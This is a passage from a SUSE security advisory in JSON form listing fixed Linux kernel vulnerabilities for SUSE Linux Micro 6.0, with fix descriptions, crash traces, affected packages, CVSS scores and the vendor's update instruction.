"SUSE Linux Micro 6.0:kernel-default-6.4.0-39.1.x86_64",
"SUSE Linux Micro 6.0:kernel-default-base-6.4.0-39.1.21.16.aarch64",
"SUSE Linux Micro 6.0:kernel-default-base-6.4.0-39.1.21.16.x86_64",
"SUSE Linux Micro 6.0:kernel-default-livepatch-6.4.0-39.1.s390x",
"SUSE Linux Micro 6.0:kernel-default-livepatch-6.4.0-39.1.x86_64",
"SUSE Linux Micro 6.0:kernel-devel-6.4.0-39.1.noarch",
"SUSE Linux Micro 6.0:kernel-kvmsmall-6.4.0-39.1.x86_64",
"SUSE Linux Micro 6.0:kernel-macros-6.4.0-39.1.noarch",
"SUSE Linux Micro 6.0:kernel-source-6.4.0-39.1.noarch"
]
}
],
"threats": [
{
"category": "impact",
"date": "2026-02-24T10:42:46Z",
"details": "moderate"
}
],
"title": "CVE-2023-54299"
},
{
"cve": "CVE-2023-54300",
"ids": [
{
"system_name": "SUSE CVE Page",
"text": "https://www.suse.com/security/cve/CVE-2023-54300"
}
],
"notes": [
{
"category": "general",
"text": "In the Linux kernel, the following vulnerability has been resolved:\n\nwifi: ath9k: avoid referencing uninit memory in ath9k_wmi_ctrl_rx\n\nFor the reasons also described in commit b383e8abed41 (\"wifi: ath9k: avoid\nuninit memory read in ath9k_htc_rx_msg()\"), ath9k_htc_rx_msg() should\nvalidate pkt_len before accessing the SKB.\n\nFor example, the obtained SKB may have been badly constructed with\npkt_len = 8. In this case, the SKB can only contain a valid htc_frame_hdr\nbut after being processed in ath9k_htc_rx_msg() and passed to\nath9k_wmi_ctrl_rx() endpoint RX handler, it is expected to have a WMI\ncommand header which should be located inside its data payload.\n\nImplement sanity checking inside ath9k_wmi_ctrl_rx(). Otherwise, uninit\nmemory can be referenced.\n\nTested on Qualcomm Atheros Communications AR9271 802.11n .\n\nFound by Linux Verification Center (linuxtesting.org) with Syzkaller.",
"title": "CVE description"
}
],
"product_status": {
"recommended": [
"SUSE Linux Micro 6.0:kernel-default-6.4.0-39.1.aarch64",
"SUSE Linux Micro 6.0:kernel-default-6.4.0-39.1.s390x",
"SUSE Linux Micro 6.0:kernel-default-6.4.0-39.1.x86_64",
"SUSE Linux Micro 6.0:kernel-default-base-6.4.0-39.1.21.16.aarch64",
"SUSE Linux Micro 6.0:kernel-default-base-6.4.0-39.1.21.16.x86_64",
"SUSE Linux Micro 6.0:kernel-default-livepatch-6.4.0-39.1.s390x",
"SUSE Linux Micro 6.0:kernel-default-livepatch-6.4.0-39.1.x86_64",
"SUSE Linux Micro 6.0:kernel-devel-6.4.0-39.1.noarch",
"SUSE Linux Micro 6.0:kernel-kvmsmall-6.4.0-39.1.x86_64",
"SUSE Linux Micro 6.0:kernel-macros-6.4.0-39.1.noarch",
"SUSE Linux Micro 6.0:kernel-source-6.4.0-39.1.noarch"
]
},
"references": [
{
"category": "external",
"summary": "CVE-2023-54300",
"url": "https://www.suse.com/security/cve/CVE-2023-54300"
},
{
"category": "external",
"summary": "SUSE Bug 1255790 for CVE-2023-54300",
"url": "https://bugzilla.suse.com/1255790"
}
],
"remediations": [
{
"category": "vendor_fix",
"details": "To install this SUSE Security Update use the SUSE recommended installation methods like YaST online_update or \"zypper patch\".\n",
"product_ids": [
"SUSE Linux Micro 6.0:kernel-default-6.4.0-39.1.aarch64",
"SUSE Linux Micro 6.0:kernel-default-6.4.0-39.1.s390x",
"SUSE Linux Micro 6.0:kernel-default-6.4.0-39.1.x86_64",
"SUSE Linux Micro 6.0:kernel-default-base-6.4.0-39.1.21.16.aarch64",
"SUSE Linux Micro 6.0:kernel-default-base-6.4.0-39.1.21.16.x86_64",
"SUSE Linux Micro 6.0:kernel-default-livepatch-6.4.0-39.1.s390x",
"SUSE Linux Micro 6.0:kernel-default-livepatch-6.4.0-39.1.x86_64",
"SUSE Linux Micro 6.0:kernel-devel-6.4.0-39.1.noarch",
"SUSE Linux Micro 6.0:kernel-kvmsmall-6.4.0-39.1.x86_64",
"SUSE Linux Micro 6.0:kernel-macros-6.4.0-39.1.noarch",
"SUSE Linux Micro 6.0:kernel-source-6.4.0-39.1.noarch"
]
}
],
"scores": [
{
"cvss_v3": {
"baseScore": 6.6,
"baseSeverity": "MEDIUM",
"vectorString": "CVSS:3.1/AV:L/AC:L/PR:L/UI:N/S:U/C:L/I:L/A:H",
"version": "3.1"
},
"products": [
"SUSE Linux Micro 6.0:kernel-default-6.4.0-39.1.aarch64",
"SUSE Linux Micro 6.0:kernel-default-6.4.0-39.1.s390x",
"SUSE Linux Micro 6.0:kernel-default-6.4.0-39.1.x86_64",
"SUSE Linux Micro 6.0:kernel-default-base-6.4.0-39.1.21.16.aarch64",
"SUSE Linux Micro 6.0:kernel-default-base-6.4.0-39.1.21.16.x86_64",
"SUSE Linux Micro 6.0:kernel-default-livepatch-6.4.0-39.1.s390x",
"SUSE Linux Micro 6.0:kernel-default-livepatch-6.4.0-39.1.x86_64",
"SUSE Linux Micro 6.0:kernel-devel-6.4.0-39.1.noarch",
"SUSE Linux Micro 6.0:kernel-kvmsmall-6.4.0-39.1.x86_64",
"SUSE Linux Micro 6.0:kernel-macros-6.4.0-39.1.noarch",
"SUSE Linux Micro 6.0:kernel-source-6.4.0-39.1.noarch"
]
}
],
"threats": [
{
"category": "impact",
"date": "2026-02-24T10:42:46Z",
"details": "moderate"
}
],
"title": "CVE-2023-54300"
},
{
"cve": "CVE-2023-54302",
"ids": [
{
"system_name": "SUSE CVE Page",
"text": "https://www.suse.com/security/cve/CVE-2023-54302"
}
],
"notes": [
{
"category": "general",
"text": "In the Linux kernel, the following vulnerability has been resolved:\n\nRDMA/irdma: Fix data race on CQP completion stats\n\nCQP completion statistics is read lockesly in irdma_wait_event and\nirdma_check_cqp_progress while it can be updated in the completion\nthread irdma_sc_ccq_get_cqe_info on another CPU as KCSAN reports.\n\nMake completion statistics an atomic variable to reflect coherent updates\nto it. This will also avoid load/store tearing logic bug potentially\npossible by compiler optimizations.\n\n[77346.170861] BUG: KCSAN: data-race in irdma_handle_cqp_op [irdma] / irdma_sc_ccq_get_cqe_info [irdma]\n\n[77346.171383] write to 0xffff8a3250b108e0 of 8 bytes by task 9544 on cpu 4:\n[77346.171483] irdma_sc_ccq_get_cqe_info+0x27a/0x370 [irdma]\n[77346.171658] irdma_cqp_ce_handler+0x164/0x270 [irdma]\n[77346.171835] cqp_compl_worker+0x1b/0x20 [irdma]\n[77346.172009] process_one_work+0x4d1/0xa40\n[77346.172024] worker_thread+0x319/0x700\n[77346.172037] kthread+0x180/0x1b0\n[77346.172054] ret_from_fork+0x22/0x30\n\n[77346.172136] read to 0xffff8a3250b108e0 of 8 bytes by task 9838 on cpu 2:\n[77346.172234] irdma_handle_cqp_op+0xf4/0x4b0 [irdma]\n[77346.172413] irdma_cqp_aeq_cmd+0x75/0xa0 [irdma]\n[77346.172592] irdma_create_aeq+0x390/0x45a [irdma]\n[77346.172769] irdma_rt_init_hw.cold+0x212/0x85d [irdma]\n[77346.172944] irdma_probe+0x54f/0x620 [irdma]\n[77346.173122] auxiliary_bus_probe+0x66/0xa0\n[77346.173137] really_probe+0x140/0x540\n[77346.173154] __driver_probe_device+0xc7/0x220\n[77346.173173] driver_probe_device+0x5f/0x140\n[77346.173190] __driver_attach+0xf0/0x2c0\n[77346.173208] bus_for_each_dev+0xa8/0xf0\n[77346.173225] driver_attach+0x29/0x30\n[77346.173240] bus_add_driver+0x29c/0x2f0\n[77346.173255] driver_register+0x10f/0x1a0\n[77346.173272] __auxiliary_driver_register+0xbc/0x140\n[77346.173287] irdma_init_module+0x55/0x1000 [irdma]\n[77346.173460] do_one_initcall+0x7d/0x410\n[77346.173475] do_init_module+0x81/0x2c0\n[77346.173491] load_module+0x1232/0x12c0\n[77346.173506] __do_sys_finit_module+0x101/0x180\n[77346.173522] __x64_sys_finit_module+0x3c/0x50\n[77346.173538] do_syscall_64+0x39/0x90\n[77346.173553] entry_SYSCALL_64_after_hwframe+0x63/0xcd\n\n[77346.173634] value changed: 0x0000000000000094 -\u003e 0x0000000000000095",
"title": "CVE description"
}
],
"product_status": {
"recommended": [
"SUSE Linux Micro 6.0:kernel-default-6.4.0-39.1.aarch64",
"SUSE Linux Micro 6.0:kernel-default-6.4.0-39.1.s390x",
"SUSE Linux Micro 6.0:kernel-default-6.4.0-39.1.x86_64",
"SUSE Linux Micro 6.0:kernel-default-base-6.4.0-39.1.21.16.aarch64",
"SUSE Linux Micro 6.0:kernel-default-base-6.4.0-39.1.21.16.x86_64",
"SUSE Linux Micro 6.0:kernel-default-livepatch-6.4.0-39.1.s390x",
"SUSE Linux Micro 6.0:kernel-default-livepatch-6.4.0-39.1.x86_64",
"SUSE Linux Micro 6.0:kernel-devel-6.4.0-39.1.noarch",
"SUSE Linux Micro 6.0:kernel-kvmsmall-6.4.0-39.1.x86_64",
"SUSE Linux Micro 6.0:kernel-macros-6.4.0-39.1.noarch",
"SUSE Linux Micro 6.0:kernel-source-6.4.0-39.1.noarch"
]
},
"references": [
{
"category": "external",
"summary": "CVE-2023-54302",
"url": "https://www.suse.com/security/cve/CVE-2023-54302"
},
{
"category": "external",
"summary": "SUSE Bug 1255792 for CVE-2023-54302",
"url": "https://bugzilla.suse.com/1255792"
}
],
"remediations": [
{
"category": "vendor_fix",
"details": "To install this SUSE Security Update use the SUSE recommended installation methods like YaST online_update or \"zypper patch\".\n",
"product_ids": [
"SUSE Linux Micro 6.0:kernel-default-6.4.0-39.1.aarch64",
"SUSE Linux Micro 6.0:kernel-default-6.4.0-39.1.s390x",
"SUSE Linux Micro 6.0:kernel-default-6.4.0-39.1.x86_64",
"SUSE Linux Micro 6.0:kernel-default-base-6.4.0-39.1.21.16.aarch64",
"SUSE Linux Micro 6.0:kernel-default-base-6.4.0-39.1.21.16.x86_64",
"SUSE Linux Micro 6.0:kernel-default-livepatch-6.4.0-39.1.s390x",
"SUSE Linux Micro 6.0:kernel-default-livepatch-6.4.0-39.1.x86_64",
"SUSE Linux Micro 6.0:kernel-devel-6.4.0-39.1.noarch",
"SUSE Linux Micro 6.0:kernel-kvmsmall-6.4.0-39.1.x86_64",
"SUSE Linux Micro 6.0:kernel-macros-6.4.0-39.1.noarch",
"SUSE Linux Micro 6.0:kernel-source-6.4.0-39.1.noarch"
]
}
],
"scores": [
{
"cvss_v3": {
"baseScore": 6.1,
"baseSeverity": "MEDIUM",
"vectorString": "CVSS:3.1/AV:L/AC:L/PR:L/UI:N/S:U/C:N/I:L/A:H",
"version": "3.1"
},
"products": [
"SUSE Linux Micro 6.0:kernel-default-6.4.0-39.1.aarch64",
"SUSE Linux Micro 6.0:kernel-default-6.4.0-39.1.s390x",
"SUSE Linux Micro 6.0:kernel-default-6.4.0-39.1.x86_64",
"SUSE Linux Micro 6.0:kernel-default-base-6.4.0-39.1.21.16.aarch64",
"SUSE Linux Micro 6.0:kernel-default-base-6.4.0-39.1.21.16.x86_64",
"SUSE Linux Micro 6.0:kernel-default-livepatch-6.4.0-39.1.s390x",
"SUSE Linux Micro 6.0:kernel-default-livepatch-6.4.0-39.1.x86_64",
"SUSE Linux Micro 6.0:kernel-devel-6.4.0-39.1.noarch",
"SUSE Linux Micro 6.0:kernel-kvmsmall-6.4.0-39.1.x86_64",
"SUSE Linux Micro 6.0:kernel-macros-6.4.0-39.1.noarch",
"SUSE Linux Micro 6.0:kernel-source-6.4.0-39.1.noarch"
]
}
],
"threats": [
{
"category": "impact",
"date": "2026-02-24T10:42:46Z",
"details": "moderate"
}
],
"title": "CVE-2023-54302"
},
{
"cve": "CVE-2023-54303",
"ids": [
{
"system_name": "SUSE CVE Page",
"text": "https://www.suse.com/security/cve/CVE-2023-54303"
}
],
"notes": [
{
"category": "general",
"text": "In the Linux kernel, the following vulnerability has been resolved:\n\nbpf: Disable preemption in bpf_perf_event_output\n\nThe nesting protection in bpf_perf_event_output relies on disabled\npreemption, which is guaranteed for kprobes and tracepoints.\n\nHowever bpf_perf_event_output can be also called from uprobes context\nthrough bpf_prog_run_array_sleepable function which disables migration,\nbut keeps preemption enabled.\n\nThis can cause task to be preempted by another one inside the nesting\nprotection and lead eventually to two tasks using same perf_sample_data\nbuffer and cause crashes like:\n\n kernel tried to execute NX-protected page - exploit attempt? (uid: 0)\n BUG: unable to handle page fault for address: ffffffff82be3eea\n ...\n Call Trace:\n ? __die+0x1f/0x70\n ? page_fault_oops+0x176/0x4d0\n ? exc_page_fault+0x132/0x230\n ? asm_exc_page_fault+0x22/0x30\n ? perf_output_sample+0x12b/0x910\n ? perf_event_output+0xd0/0x1d0\n ? bpf_perf_event_output+0x162/0x1d0\n ? bpf_prog_c6271286d9a4c938_krava1+0x76/0x87\n ? __uprobe_perf_func+0x12b/0x540\n ? uprobe_dispatcher+0x2c4/0x430\n ? uprobe_notify_resume+0x2da/0xce0\n ? atomic_notifier_call_chain+0x7b/0x110\n ? exit_to_user_mode_prepare+0x13e/0x290\n ? irqentry_exit_to_user_mode+0x5/0x30\n ? asm_exc_int3+0x35/0x40\n\nFixing this by disabling preemption in bpf_perf_event_output.",
"title": "CVE description"
}
],
"product_status": {
"recommended": [
"SUSE Linux Micro 6.0:kernel-default-6.4.0-39.1.aarch64",
"SUSE Linux Micro 6.0:kernel-default-6.4.0-39.1.s390x",
"SUSE Linux Micro 6.0:kernel-default-6.4.0-39.1.x86_64",
"SUSE Linux Micro 6.0:kernel-default-base-6.4.0-39.1.21.16.aarch64",
"SUSE Linux Micro 6.0:kernel-default-base-6.4.0-39.1.21.16.x86_64",
"SUSE Linux Micro 6.0:kernel-default-livepatch-6.4.0-39.1.s390x",
"SUSE Linux Micro 6.0:kernel-default-livepatch-6.4.0-39.1.x86_64",
"SUSE Linux Micro 6.0:kernel-devel-6.4.0-39.1.noarch",
"SUSE Linux Micro 6.0:kernel-kvmsmall-6.4.0-39.1.x86_64",
"SUSE Linux Micro 6.0:kernel-macros-6.4.0-39.1.noarch",
"SUSE Linux Micro 6.0:kernel-source-6.4.0-39.1.noarch"
]
},
"references": [
{
"category": "external",
"summary": "CVE-2023-54303",
"url": "https://www.suse.com/security/cve/CVE-2023-54303"
},
{
"category": "external",
"summary": "SUSE Bug 1255785 for CVE-2023-54303",
"url": "https://bugzilla.suse.com/1255785"
}
],
"remediations": [
{
"category": "vendor_fix",
"details": "To install this SUSE Security Update use the SUSE recommended installation methods like YaST online_update or \"zypper patch\".\n",
"product_ids": [
"SUSE Linux Micro 6.0:kernel-default-6.4.0-39.1.aarch64",
"SUSE Linux Micro 6.0:kernel-default-6.4.0-39.1.s390x",
"SUSE Linux Micro 6.0:kernel-default-6.4.0-39.1.x86_64",
"SUSE Linux Micro 6.0:kernel-default-base-6.4.0-39.1.21.16.aarch64",
"SUSE Linux Micro 6.0:kernel-default-base-6.4.0-39.1.21.16.x86_64",
"SUSE Linux Micro 6.0:kernel-default-livepatch-6.4.0-39.1.s390x",
"SUSE Linux Micro 6.0:kernel-default-livepatch-6.4.0-39.1.x86_64",
"SUSE Linux Micro 6.0:kernel-devel-6.4.0-39.1.noarch",
"SUSE Linux Micro 6.0:kernel-kvmsmall-6.4.0-39.1.x86_64",
"SUSE Linux Micro 6.0:kernel-macros-6.4.0-39.1.noarch",
"SUSE Linux Micro 6.0:kernel-source-6.4.0-39.1.noarch"
]
}
],
"scores": [
{
"cvss_v3": {
"baseScore": 6.6,
"baseSeverity": "MEDIUM",
"vectorString": "CVSS:3.1/AV:L/AC:L/PR:L/UI:N/S:U/C:L/I:L/A:H",
"version": "3.1"
},
"products": [
"SUSE Linux Micro 6.0:kernel-default-6.4.0-39.1.aarch64",
"SUSE Linux Micro 6.0:kernel-default-6.4.0-39.1.s390x",
"SUSE Linux Micro 6.0:kernel-default-6.4.0-39.1.x86_64",
"SUSE Linux Micro 6.0:kernel-default-base-6.4.0-39.1.21.16.aarch64",
"SUSE Linux Micro 6.0:kernel-default-base-6.4.0-39.1.21.16.x86_64",
"SUSE Linux Micro 6.0:kernel-default-livepatch-6.4.0-39.1.s390x",
"SUSE Linux Micro 6.0:kernel-default-livepatch-6.4.0-39.1.x86_64",
"SUSE Linux Micro 6.0:kernel-devel-6.4.0-39.1.noarch",
"SUSE Linux Micro 6.0:kernel-kvmsmall-6.4.0-39.1.x86_64",
"SUSE Linux Micro 6.0:kernel-macros-6.4.0-39.1.noarch",
"SUSE Linux Micro 6.0:kernel-source-6.4.0-39.1.noarch"
]
}
],
"threats": [
{
"category": "impact",
"date": "2026-02-24T10:42:46Z",
"details": "moderate"
}
],
"title": "CVE-2023-54303"
},
{
"cve": "CVE-2023-54304",
"ids": [
{
"system_name": "SUSE CVE Page",
"text": "https://www.suse.com/security/cve/CVE-2023-54304"
}
],
"notes": [
{
"category": "general",
"text": "In the Linux kernel, the following vulnerability has been resolved:\n\nfirmware: meson_sm: fix to avoid potential NULL pointer dereference\n\nof_match_device() may fail and returns a NULL pointer.\n\nFix this by checking the return value of of_match_device.",
"title": "CVE description"
}
],
"product_status": {
"recommended": [
"SUSE Linux Micro 6.0:kernel-default-6.4.0-39.1.aarch64",
"SUSE Linux Micro 6.0:kernel-default-6.4.0-39.1.s390x",
"SUSE Linux Micro 6.0:kernel-default-6.4.0-39.1.x86_64",
"SUSE Linux Micro 6.0:kernel-default-base-6.4.0-39.1.21.16.aarch64",
"SUSE Linux Micro 6.0:kernel-default-base-6.4.0-39.1.21.16.x86_64",
"SUSE Linux Micro 6.0:kernel-default-livepatch-6.4.0-39.1.s390x",
"SUSE Linux Micro 6.0:kernel-default-livepatch-6.4.0-39.1.x86_64",
"SUSE Linux Micro 6.0:kernel-devel-6.4.0-39.1.noarch",
"SUSE Linux Micro 6.0:kernel-kvmsmall-6.4.0-39.1.x86_64",
"SUSE Linux Micro 6.0:kernel-macros-6.4.0-39.1.noarch",
"SUSE Linux Micro 6.0:kernel-source-6.4.0-39.1.noarch"
]
},
"references": [
{
"category": "external",
"summary": "CVE-2023-54304",
"url": "https://www.suse.com/security/cve/CVE-2023-54304"
},
{
"category": "external",
"summary": "SUSE Bug 1255786 for CVE-2023-54304",
"url": "https://bugzilla.suse.com/1255786"
}
],
"remediations": [
{
"category": "vendor_fix",
"details": "To install this SUSE Security Update use the SUSE recommended installation methods like YaST online_update or \"zypper patch\".\n",
"product_ids": [
"SUSE Linux Micro 6.0:kernel-default-6.4.0-39.1.aarch64",
"SUSE Linux Micro 6.0:kernel-default-6.4.0-39.1.s390x",
"SUSE Linux Micro 6.0:kernel-default-6.4.0-39.1.x86_64",
"SUSE Linux Micro 6.0:kernel-default-base-6.4.0-39.1.21.16.aarch64",
"SUSE Linux Micro 6.0:kernel-default-base-6.4.0-39.1.21.16.x86_64",
"SUSE Linux Micro 6.0:kernel-default-livepatch-6.4.0-39.1.s390x",
"SUSE Linux Micro 6.0:kernel-default-livepatch-6.4.0-39.1.x86_64",
"SUSE Linux Micro 6.0:kernel-devel-6.4.0-39.1.noarch",
"SUSE Linux Micro 6.0:kernel-kvmsmall-6.4.0-39.1.x86_64",
"SUSE Linux Micro 6.0:kernel-macros-6.4.0-39.1.noarch",
"SUSE Linux Micro 6.0:kernel-source-6.4.0-39.1.noarch"
]
}
],
"scores": [
{
"cvss_v3": {
"baseScore": 5.5,
"baseSeverity": "MEDIUM",
"vectorString": "CVSS:3.1/AV:L/AC:L/PR:L/UI:N/S:U/C:N/I:N/A:H",
"version": "3.1"
},
"products": [
"SUSE Linux Micro 6.0:kernel-default-6.4.0-39.1.aarch64",
"SUSE Linux Micro 6.0:kernel-default-6.4.0-39.1.s390x",
"SUSE Linux Micro 6.0:kernel-default-6.4.0-39.1.x86_64",
"SUSE Linux Micro 6.0:kernel-default-base-6.4.0-39.1.21.16.aarch64",
"SUSE Linux Micro 6.0:kernel-default-base-6.4.0-39.1.21.16.x86_64",
"SUSE Linux Micro 6.0:kernel-default-livepatch-6.4.0-39.1.s390x",
"SUSE Linux Micro 6.0:kernel-default-livepatch-6.4.0-39.1.x86_64",
"SUSE Linux Micro 6.0:kernel-devel-6.4.0-39.1.noarch",
"SUSE Linux Micro 6.0:kernel-kvmsmall-6.4.0-39.1.x86_64",
"SUSE Linux Micro 6.0:kernel-macros-6.4.0-39.1.noarch",
"SUSE Linux Micro 6.0:kernel-source-6.4.0-39.1.noarch"
]
}
],
"threats": [
{
"category": "impact",
"date": "2026-02-24T10:42:46Z",
"details": "moderate"
}
],
"title": "CVE-2023-54304"
},
{
"cve": "CVE-2023-54309",
"ids": [
{
"system_name": "SUSE CVE Page",
"text": "https://www.suse.com/security/cve/CVE-2023-54309"
}
],
"notes": [
{
"category": "general",
"text": "In the Linux kernel, the following vulnerability has been resolved:\n\ntpm: tpm_vtpm_proxy: fix a race condition in /dev/vtpmx creation\n\n/dev/vtpmx is made visible before \u0027workqueue\u0027 is initialized, which can\nlead to a memory corruption in the worst case scenario.\n\nAddress this by initializing \u0027workqueue\u0027 as the very first step of the\ndriver initialization.",
"title": "CVE description"
}
],
"product_status": {
"recommended": [
"SUSE Linux Micro 6.0:kernel-default-6.4.0-39.1.aarch64",
"SUSE Linux Micro 6.0:kernel-default-6.4.0-39.1.s390x",
"SUSE Linux Micro 6.0:kernel-default-6.4.0-39.1.x86_64",
"SUSE Linux Micro 6.0:kernel-default-base-6.4.0-39.1.21.16.aarch64",
"SUSE Linux Micro 6.0:kernel-default-base-6.4.0-39.1.21.16.x86_64",
"SUSE Linux Micro 6.0:kernel-default-livepatch-6.4.0-39.1.s390x",
"SUSE Linux Micro 6.0:kernel-default-livepatch-6.4.0-39.1.x86_64",
"SUSE Linux Micro 6.0:kernel-devel-6.4.0-39.1.noarch",
"SUSE Linux Micro 6.0:kernel-kvmsmall-6.4.0-39.1.x86_64",
"SUSE Linux Micro 6.0:kernel-macros-6.4.0-39.1.noarch",
"SUSE Linux Micro 6.0:kernel-source-6.4.0-39.1.noarch"
]
},
"references": [
{
"category": "external",
"summary": "CVE-2023-54309",
"url": "https://www.suse.com/security/cve/CVE-2023-54309"
},
{
"category": "external",
"summary": "SUSE Bug 1255780 for CVE-2023-54309",
"url": "https://bugzilla.suse.com/1255780"
}
],
"remediations": [
{
"category": "vendor_fix",
"details": "To install this SUSE Security Update use the SUSE recommended installation methods like YaST online_update or \"zypper patch\".\n",
"product_ids": [
"SUSE Linux Micro 6.0:kernel-default-6.4.0-39.1.aarch64",
"SUSE Linux Micro 6.0:kernel-default-6.4.0-39.1.s390x",
"SUSE Linux Micro 6.0:kernel-default-6.4.0-39.1.x86_64",
"SUSE Linux Micro 6.0:kernel-default-base-6.4.0-39.1.21.16.aarch64",
"SUSE Linux Micro 6.0:kernel-default-base-6.4.0-39.1.21.16.x86_64",
"SUSE Linux Micro 6.0:kernel-default-livepatch-6.4.0-39.1.s390x",
"SUSE Linux Micro 6.0:kernel-default-livepatch-6.4.0-39.1.x86_64",
"SUSE Linux Micro 6.0:kernel-devel-6.4.0-39.1.noarch",
"SUSE Linux Micro 6.0:kernel-kvmsmall-6.4.0-39.1.x86_64",
"SUSE Linux Micro 6.0:kernel-macros-6.4.0-39.1.noarch",
"SUSE Linux Micro 6.0:kernel-source-6.4.0-39.1.noarch"
]
}
],
"scores": [
{
"cvss_v3": {
"baseScore": 6.3,
"baseSeverity": "MEDIUM",
"vectorString": "CVSS:3.1/AV:L/AC:H/PR:L/UI:N/S:U/C:N/I:H/A:H",
"version": "3.1"
},
"products": [
"SUSE Linux Micro 6.0:kernel-default-6.4.0-39.1.aarch64",
"SUSE Linux Micro 6.0:kernel-default-6.4.0-39.1.s390x",
"SUSE Linux Micro 6.0:kernel-default-6.4.0-39.1.x86_64",
"SUSE Linux Micro 6.0:kernel-default-base-6.4.0-39.1.21.16.aarch64",
"SUSE Linux Micro 6.0:kernel-default-base-6.4.0-39.1.21.16.x86_64",
"SUSE Linux Micro 6.0:kernel-default-livepatch-6.4.0-39.1.s390x",
"SUSE Linux Micro 6.0:kernel-default-livepatch-6.4.0-39.1.x86_64",
"SUSE Linux Micro 6.0:kernel-devel-6.4.0-39.1.noarch",
"SUSE Linux Micro 6.0:kernel-kvmsmall-6.4.0-39.1.x86_64",
"SUSE Linux Micro 6.0:kernel-macros-6.4.0-39.1.noarch",
"SUSE Linux Micro 6.0:kernel-source-6.4.0-39.1.noarch"
]
}
],
"threats": [
{
"category": "impact",
"date": "2026-02-24T10:42:46Z",
"details": "moderate"
}
],
"title": "CVE-2023-54309"
},
{
"cve": "CVE-2023-54312",
"ids": [
{
"system_name": "SUSE CVE Page",
"text": "https://www.suse.com/security/cve/CVE-2023-54312"
}
],
"notes": [
{
"category": "general",
"text": "In the Linux kernel, the following vulnerability has been resolved:\n\nsamples/bpf: Fix buffer overflow in tcp_basertt\n\nUsing sizeof(nv) or strlen(nv)+1 is correct.",
"title": "CVE description"
}
],
"product_status": {
"recommended": [
"SUSE Linux Micro 6.0:kernel-default-6.4.0-39.1.aarch64",
"SUSE Linux Micro 6.0:kernel-default-6.4.0-39.1.s390x",
"SUSE Linux Micro 6.0:kernel-default-6.4.0-39.1.x86_64",
"SUSE Linux Micro 6.0:kernel-default-base-6.4.0-39.1.21.16.aarch64",
"SUSE Linux Micro 6.0:kernel-default-base-6.4.0-39.1.21.16.x86_64",
"SUSE Linux Micro 6.0:kernel-default-livepatch-6.4.0-39.1.s390x",
"SUSE Linux Micro 6.0:kernel-default-livepatch-6.4.0-39.1.x86_64",
"SUSE Linux Micro 6.0:kernel-devel-6.4.0-39.1.noarch",
"SUSE Linux Micro 6.0:kernel-kvmsmall-6.4.0-39.1.x86_64",
"SUSE Linux Micro 6.0:kernel-macros-6.4.0-39.1.noarch",
"SUSE Linux Micro 6.0:kernel-source-6.4.0-39.1.noarch"
]
},
"references": [
{
"category": "external",
"summary": "CVE-2023-54312",
"url": "https://www.suse.com/security/cve/CVE-2023-54312"
},
{
"category": "external",
"summary": "SUSE Bug 1255774 for CVE-2023-54312",
"url": "https://bugzilla.suse.com/1255774"
}
],
"remediations": [
{
"category": "vendor_fix",
"details": "To install this SUSE Security Update use the SUSE recommended installation methods like YaST online_update or \"zypper patch\".\n",
"product_ids": [
"SUSE Linux Micro 6.0:kernel-default-6.4.0-39.1.aarch64",
"SUSE Linux Micro 6.0:kernel-default-6.4.0-39.1.s390x",
"SUSE Linux Micro 6.0:kernel-default-6.4.0-39.1.x86_64",
"SUSE Linux Micro 6.0:kernel-default-base-6.4.0-39.1.21.16.aarch64",
"SUSE Linux Micro 6.0:kernel-default-base-6.4.0-39.1.21.16.x86_64",
"SUSE Linux Micro 6.0:kernel-default-livepatch-6.4.0-39.1.s390x",
"SUSE Linux Micro 6.0:kernel-default-livepatch-6.4.0-39.1.x86_64",
"SUSE Linux Micro 6.0:kernel-devel-6.4.0-39.1.noarch",
"SUSE Linux Micro 6.0:kernel-kvmsmall-6.4.0-39.1.x86_64",
"SUSE Linux Micro 6.0:kernel-macros-6.4.0-39.1.noarch",
"SUSE Linux Micro 6.0:kernel-source-6.4.0-39.1.noarch"
]
}
],
"scores": [
{
"cvss_v3": {
"baseScore": 6.1,
"baseSeverity": "MEDIUM",
"vectorString": "CVSS:3.1/AV:L/AC:L/PR:L/UI:N/S:U/C:N/I:L/A:H",
"version": "3.1"
},
"products": [
"SUSE Linux Micro 6.0:kernel-default-6.4.0-39.1.aarch64",
"SUSE Linux Micro 6.0:kernel-default-6.4.0-39.1.s390x",
"SUSE Linux Micro 6.0:kernel-default-6.4.0-39.1.x86_64",
"SUSE Linux Micro 6.0:kernel-default-base-6.4.0-39.1.21.16.aarch64",
"SUSE Linux Micro 6.0:kernel-default-base-6.4.0-39.1.21.16.x86_64",
"SUSE Linux Micro 6.0:kernel-default-livepatch-6.4.0-39.1.s390x",
"SUSE Linux Micro 6.0:kernel-default-livepatch-6.4.0-39.1.x86_64",
"SUSE Linux Micro 6.0:kernel-devel-6.4.0-39.1.noarch",
"SUSE Linux Micro 6.0:kernel-kvmsmall-6.4.0-39.1.x86_64",
"SUSE Linux Micro 6.0:kernel-macros-6.4.0-39.1.noarch",
"SUSE Linux Micro 6.0:kernel-source-6.4.0-39.1.noarch"
]
}
],
"threats": [
{
"category": "impact",
"date": "2026-02-24T10:42:46Z",
"details": "moderate"
}
],
"title": "CVE-2023-54312"
},
{
"cve": "CVE-2023-54313",
"ids": [
{
"system_name": "SUSE CVE Page",
"text": "https://www.suse.com/security/cve/CVE-2023-54313"
}
],
"notes": [
{
"category": "general",
"text": "In the Linux kernel, the following vulnerability has been resolved:\n\novl: fix null pointer dereference in ovl_get_acl_rcu()\n\nFollowing process:\n P1 P2\n path_openat\n link_path_walk\n may_lookup\n inode_permission(rcu)\n ovl_permission\n acl_permission_check\n check_acl\n get_cached_acl_rcu\n\t ovl_get_inode_acl\n\t realinode = ovl_inode_real(ovl_inode)\n\t drop_cache\n\t\t __dentry_kill(ovl_dentry)\n\t\t\t\tiput(ovl_inode)\n\t\t ovl_destroy_inode(ovl_inode)\n\t\t dput(oi-\u003e__upperdentry)\n\t\t dentry_kill(upperdentry)\n\t\t dentry_unlink_inode\n\t\t\t\t upperdentry-\u003ed_inode = NULL\n\t ovl_inode_upper\n\t upperdentry = ovl_i_dentry_upper(ovl_inode)\n\t d_inode(upperdentry) // returns NULL\n\t IS_POSIXACL(realinode) // NULL pointer dereference\n, will trigger an null pointer dereference at realinode:\n [ 205.472797] BUG: kernel NULL pointer dereference, address:\n 0000000000000028\n [ 205.476701] CPU: 2 PID: 2713 Comm: ls Not tainted\n 6.3.0-12064-g2edfa098e750-dirty #1216\n [ 205.478754] RIP: 0010:do_ovl_get_acl+0x5d/0x300\n [ 205.489584] Call Trace:\n [ 205.489812] \u003cTASK\u003e\n [ 205.490014] ovl_get_inode_acl+0x26/0x30\n [ 205.490466] 